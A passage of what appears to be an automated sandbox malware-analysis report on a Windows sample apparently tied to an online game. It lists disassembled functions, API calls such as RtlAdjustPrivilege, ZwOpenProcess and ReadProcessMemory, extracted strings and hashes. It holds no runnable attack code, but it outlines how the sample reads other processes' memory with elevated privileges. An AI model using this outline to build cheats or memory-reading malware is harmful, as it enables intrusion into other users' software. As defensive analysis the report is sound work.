                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FileMutexReleaseUnmapView
                                                                                  • String ID: eno198
                                                                                  • API String ID: 809188715-2945690544
                                                                                  • Opcode ID: 8c11749f6924c10ff54765b0c10b7a289d95737e9c1b431ed3d91136b2317686
                                                                                  • Instruction ID: 7d7e2a52be85dfabef9d8789fdb06815dc952c6bc934110d08f84c6f85b547a2
                                                                                  • Opcode Fuzzy Hash: 8c11749f6924c10ff54765b0c10b7a289d95737e9c1b431ed3d91136b2317686
                                                                                  • Instruction Fuzzy Hash: 50313C706212068FEB01EF6AE492A5A77F2EF89244F51B171E424CB7A0D734ED45CBE0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D78CE
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D790C
                                                                                  • _memset.LIBCMT ref: 6A6D7923
                                                                                  • _memset.LIBCMT ref: 6A6D7940
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: game Module
                                                                                  • API String ID: 1275148839-1822240276
                                                                                  • Opcode ID: 7d944ea52beaf5003c6c38ea2cc76ee1c3a772a8dd9663900486a7801df72da3
                                                                                  • Instruction ID: f939f72445a1fd75ff3a9d3de96c1d07005c2aa7922a1ba57dffb5c3c0755b13
                                                                                  • Opcode Fuzzy Hash: 7d944ea52beaf5003c6c38ea2cc76ee1c3a772a8dd9663900486a7801df72da3
                                                                                  • Instruction Fuzzy Hash: D221C1B2508384AFE220D664DD99FDBB7EC9B98348F44482DE59886152EA70960CC7E7
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6E5E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6E9C
                                                                                  • _memset.LIBCMT ref: 6A6D6EB9
                                                                                  • _memset.LIBCMT ref: 6A6D6ED0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.GeeM2.com
                                                                                  • API String ID: 1275148839-2438832739
                                                                                  • Opcode ID: c61c874e200bb0b822263bccbb4436473a3972e4708a33a18cbac576e1a84dd5
                                                                                  • Instruction ID: d5a2592d620592533886483ad4d5d6b45b0588bbb7be6143e9ce20ae10e3b849
                                                                                  • Opcode Fuzzy Hash: c61c874e200bb0b822263bccbb4436473a3972e4708a33a18cbac576e1a84dd5
                                                                                  • Instruction Fuzzy Hash: 7021B2B16083846AD220D624D995FDB7BED9B88348F44492CE698C6142EE709A0CC7A2
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6F7E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6FB6
                                                                                  • _memset.LIBCMT ref: 6A6D6FD3
                                                                                  • _memset.LIBCMT ref: 6A6D6FF0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: Wemade Entertainment
                                                                                  • API String ID: 1275148839-1055062729
                                                                                  • Opcode ID: 53bbf1790d52eaf0f247cf4a03627546bbe3f20e88086b362f2ff27f249fd97b
                                                                                  • Instruction ID: 1fc3a150ef9f9fe134377bd503d06b45138d067e4b0f50167acaffb3f7971318
                                                                                  • Opcode Fuzzy Hash: 53bbf1790d52eaf0f247cf4a03627546bbe3f20e88086b362f2ff27f249fd97b
                                                                                  • Instruction Fuzzy Hash: C421C4F1508384ABD320D624DD95FDB77EC9B98348F44492DE69886292EE749A0C87A3
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D7C9E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7CD6
                                                                                  • _memset.LIBCMT ref: 6A6D7CF3
                                                                                  • _memset.LIBCMT ref: 6A6D7D10
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.xm2m2.com
                                                                                  • API String ID: 1275148839-1391355098
                                                                                  • Opcode ID: ae49b8c7d0d5ca29138310f43e6636e843d070e63c58e5dd22967bb62a23e283
                                                                                  • Instruction ID: 0b6ecb562d6c6c349b93f63d910122fb71ed3e9287d5fad5156ee3f4b10bb8c8
                                                                                  • Opcode Fuzzy Hash: ae49b8c7d0d5ca29138310f43e6636e843d070e63c58e5dd22967bb62a23e283
                                                                                  • Instruction Fuzzy Hash: 4C21C1B1508384ABD230E724DD99FEB77EC9B98348F44492DE59886252EE70960C87E3
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D6D3E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D6D7C
                                                                                  • _memset.LIBCMT ref: 6A6D6D93
                                                                                  • _memset.LIBCMT ref: 6A6D6DB0
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID: http://www.Haom6.com
                                                                                  • API String ID: 1275148839-2633146352
                                                                                  • Opcode ID: 8de02069550d2554b456b8d29f9e11010f1fa2d191ac90a111eb146fa27e2d39
                                                                                  • Instruction ID: 578383488c71e41bbe359fe3715f16fec8a352e5145c96363da279569c31c5ba
                                                                                  • Opcode Fuzzy Hash: 8de02069550d2554b456b8d29f9e11010f1fa2d191ac90a111eb146fa27e2d39
                                                                                  • Instruction Fuzzy Hash: 3621C4B15083846AD320D664DD99FDB77EC9B88348F44482CF69886242EE70960CC7E3
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 2532819045-85274317
                                                                                  • Opcode ID: 80222125cd1e5c703d248e771f74134fdc6a87b046a7d4fe4d79354fbf4c0d91
                                                                                  • Instruction ID: 9a12f440da1eecef85baf5d5750d992511909895e6b3a9aff83c9941eaee99a0
                                                                                  • Opcode Fuzzy Hash: 80222125cd1e5c703d248e771f74134fdc6a87b046a7d4fe4d79354fbf4c0d91
                                                                                  • Instruction Fuzzy Hash: 101129712052049BEB15ABB8C954BB73BE5AF823D4F1A4069E857C72A1DF31FC0AC791
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6A6F5CCC
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 6A6F5CE4
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 6A6F5CEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$InfoParameters
                                                                                  • String ID: B$DISPLAY
                                                                                  • API String ID: 3136151823-3316187204
                                                                                  • Opcode ID: b1c0211cea7d574b5ba1f76c646f1f15916ab082cb6640ac1c882bd177b39b1b
                                                                                  • Instruction ID: 196064fa6743fba83b3edabf380cbc078968a5316fdebbc25582433eea1fff22
                                                                                  • Opcode Fuzzy Hash: b1c0211cea7d574b5ba1f76c646f1f15916ab082cb6640ac1c882bd177b39b1b
                                                                                  • Instruction Fuzzy Hash: 2C11CD71602225ABDF119F64CC88A5B7FEEEF06750B158865FD05AF006DA70CD02CBE5
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E06A8
                                                                                    • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
                                                                                    • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
                                                                                    • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
                                                                                    • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                  • String ID: .$l$olp$p
                                                                                  • API String ID: 113637525-2661486703
                                                                                  • Opcode ID: 01422e504d6fc8e54cd2a533702d6b91ea73c1eb3b5b770aa69f2e0179c1139d
                                                                                  • Instruction ID: 3a52ebcade0b0906d5a30bc71a6f92df1d05f16464b57d018fddb8aef829ee8b
                                                                                  • Opcode Fuzzy Hash: 01422e504d6fc8e54cd2a533702d6b91ea73c1eb3b5b770aa69f2e0179c1139d
                                                                                  • Instruction Fuzzy Hash: 1C21516110D3C19ED712CB689444BDBBFE56F96248F08895DE4D847242DA75D60CCBA3
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6E7D97
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6E7DAA
                                                                                    • Part of subcall function 6A6E7290: _malloc.LIBCMT ref: 6A6E72DC
                                                                                    • Part of subcall function 6A6E7290: _memset.LIBCMT ref: 6A6E72EC
                                                                                  • _memcpy_s.LIBCMT ref: 6A6E7DDB
                                                                                    • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                    • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                    • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap_malloc_memset$AllocErrorFreeLast___sbh_find_block___sbh_free_block__lock_memcpy_s
                                                                                  • String ID: $:rj$$:rj
                                                                                  • API String ID: 3311450307-2097293139
                                                                                  • Opcode ID: 6cffbc03f1cf9f14294218331b1f92a19b406e7b704ada8274f7825eb843a087
                                                                                  • Instruction ID: 5ec57d6e44c542770cb242586750ffe13dcf0116d8435051fff5ca3be165e3ed
                                                                                  • Opcode Fuzzy Hash: 6cffbc03f1cf9f14294218331b1f92a19b406e7b704ada8274f7825eb843a087
                                                                                  • Instruction Fuzzy Hash: F61142F150C381AFE700CF54D985A1BBBE8FB95608F444E2DF58497241EB38DA088BA7
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91C23
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91C36
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0BEFB5CC,00000000,;(), ref: 0BE91C60
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91CCE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID: ;(
                                                                                  • API String ID: 730355536-3979793246
                                                                                  • Opcode ID: 01aec1b9aad86d89e0e45f5154dbb86d056672d4495cf90fd85dd5529d23c2f7
                                                                                  • Instruction ID: 7d9e43d2e2c7deeeb8429a6a733466dd65af3ed326f2001482ffa66addc04f48
                                                                                  • Opcode Fuzzy Hash: 01aec1b9aad86d89e0e45f5154dbb86d056672d4495cf90fd85dd5529d23c2f7
                                                                                  • Instruction Fuzzy Hash: 571198B0604203FFDF19EBB6E50275877E6DB89304F11A0A5E210B7780C6788E44CB66
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C52
                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C85
                                                                                  • RegCloseKey.ADVAPI32(?,0BE93CA8,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                  • API String ID: 3677997916-4173385793
                                                                                  • Opcode ID: a4a0414ba834d7544ebf33e91f3c9cb243f64b3a82a0051e92820e0d728d1bae
                                                                                  • Instruction ID: c5d738651cf60d14dbe8a5c5c7bc97ed203b02fa27a8e3aeb1a591c63f11bb0f
                                                                                  • Opcode Fuzzy Hash: a4a0414ba834d7544ebf33e91f3c9cb243f64b3a82a0051e92820e0d728d1bae
                                                                                  • Instruction Fuzzy Hash: 0001D875A40709BEEF11DB90ED42BAD77FCE748B00F900061BA14E2580E6749A14C768
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
                                                                                    • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                    • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
                                                                                    • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                    • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8415
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8443
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateCloseHandleInformationModule32OpenQuerySystem$AdjustCreateFirstFreeNextPrivilegeReadSnapshotToolhelp32_memset
                                                                                  • String ID: D3DX81ab.dll$[$^
                                                                                  • API String ID: 3593499547-4121992622
                                                                                  • Opcode ID: 86ecef88f3fbb365384cf345d486885f0fec1d36ad62b64806b22bc1e4406a2e
                                                                                  • Instruction ID: de720b9190465614018abd72c61529b060d2d5e467be7369fead5742c8aeb48c
                                                                                  • Opcode Fuzzy Hash: 86ecef88f3fbb365384cf345d486885f0fec1d36ad62b64806b22bc1e4406a2e
                                                                                  • Instruction Fuzzy Hash: D601D621509390AAD3009B698C4975B7ED85FC6651F09862CF8D8D72E1D7B4C909C7B7
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
